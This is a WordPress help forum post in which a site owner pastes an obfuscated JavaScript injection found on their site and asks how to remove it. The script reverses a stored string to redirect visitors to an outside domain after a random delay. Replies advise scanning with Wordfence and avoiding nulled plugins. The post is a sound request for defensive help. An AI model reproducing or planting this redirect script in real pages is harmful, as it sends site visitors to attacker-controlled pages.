Malware script question

Anyone seen this before and any tips on rooting it out?

*script>$zXz=function(n){if (typeof ($zXz.list[n]) == “string”) return $zXz.list[n].split(“”).reverse().join(“”);return $zXz.list[n];};$zXz.list=[“\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tor/classic-edi<script>$zXz=function(n){if (typeof ($zXz.list[n]) == “string”) return $zXz.list[n].split(“”).reverse().join(“”);return $zXz.list[n];};$zXz.list=[“\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script*tor.php

3 Comments
  1. Hello,

    May I know where you have found this script under any plugin/theme?

    Or your WordPress site is compromised? If yes, then you should ask your web hosting provider to run a malware scan on your whole website.

  2. It’s pointless to try and decode malware. What you need to do is find out *why* you were compromised. Typically this is caused by an out of date/vulnerable plugin or theme. Install Wordfence and run a scan.

  3. Yes, these are also mostly found in nulled plugins and themes. Scan your site with wordfence plugin and clean it.

 

This site will teach you how to build a WordPress website for beginners. We will cover everything from installing WordPress to adding pages, posts, and images to your site. You will learn how to customize your site with themes and plugins, as well as how to market your site online.

Your Advertisement Here